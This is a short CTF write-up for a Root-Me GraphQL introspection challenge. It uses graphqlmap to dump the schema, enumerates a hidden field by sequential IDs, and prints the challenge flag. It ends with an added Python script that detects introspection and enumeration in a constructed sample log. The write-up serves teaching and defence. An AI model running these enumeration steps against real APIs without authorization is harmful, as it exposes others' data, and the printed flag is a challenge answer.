GraphQL-Introspection | Avishai’s CTF Writeups


Here we can see that there is a basic GraphQL introspection query we can execute. I'll use the tool GraphQLmap.

Run this command:

graphqlmap -u http://challenge01.root-me.org:59077/rocketql -v --method POST

Then run dump_via_introspection.

[Image: graphqlmap]

Okay, let's see what is inside IAmNotHere:

GraphQLmap > {IAmNotHere(very_long_id:0){very_long_value}}
None
{
    "data": {
        "IAmNotHere": null
    }
}

Fine, next value:

GraphQLmap > {IAmNotHere(very_long_id:1){very_long_value}}
None
{
    "data": {
        "IAmNotHere": [
            {
                "very_long_value": "n"
            }
        ]
    }
}

Interesting. Let's automate this using Burp.

[Image: Final image]

We get nothingherelol, and then we can see the flag: RM{1ntr0sp3ct1On_1s_us3ful}

Flag: RM{1ntr0sp3ct1On_1s_us3ful}
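
From the defending side, the two steps above (a schema dump via introspection, then walking very_long_id one value at a time) leave a recognisable trail in GraphQL request logs. The sketch below is an added example, not part of the original writeup: the log format, the client IPs, the rockets field and the min_run threshold are assumptions, and the sample log is constructed.

```python
import re
from collections import defaultdict

# Constructed sample log: (client, GraphQL query body) pairs. The IPs and the
# "rockets" field are hypothetical; IAmNotHere/very_long_id come from the writeup.
SAMPLE_LOG = (
    [("10.0.0.5", "{__schema{types{name fields{name args{name}}}}}")]
    + [("10.0.0.5", "{IAmNotHere(very_long_id:%d){very_long_value}}" % i)
       for i in range(8)]
    + [("10.0.0.9", "{rockets(id:7){name __typename}}"),
       ("10.0.0.9", "{rockets(id:42){name}}")]
)

# __schema / __type are the introspection entry points; __typename is not matched.
INTROSPECTION = re.compile(r"\b__(?:schema|type)\b")
# field(arg: <int>), e.g. IAmNotHere(very_long_id:3)
INT_ARG = re.compile(r"(\w+)\(\s*(\w+)\s*:\s*(\d+)\s*\)")


def longest_run(values):
    """Length of the longest run of consecutive integers in a set."""
    best = 0
    for v in values:
        if v - 1 not in values:          # v starts a run
            n = 1
            while v + n in values:
                n += 1
            best = max(best, n)
    return best


def analyze(log, min_run=5):
    """Return (clients that sent introspection, {(client, field, arg): run})."""
    introspectors = set()
    seen = defaultdict(set)
    for client, query in log:
        if INTROSPECTION.search(query):
            introspectors.add(client)
        for field, arg, value in INT_ARG.findall(query):
            seen[(client, field, arg)].add(int(value))
    runs = {key: longest_run(vals) for key, vals in seen.items()}
    return introspectors, {k: r for k, r in runs.items() if r >= min_run}


if __name__ == "__main__":
    who, enum = analyze(SAMPLE_LOG)
    print("introspection from:", sorted(who))
    for (client, field, arg), run in enum.items():
        print(f"{client} walked {field}.{arg} over {run} consecutive values")
```

A client that appears in both results, as 10.0.0.5 does here, matches the pattern in this writeup; disabling introspection in production and authorizing per-object access address the underlying exposure.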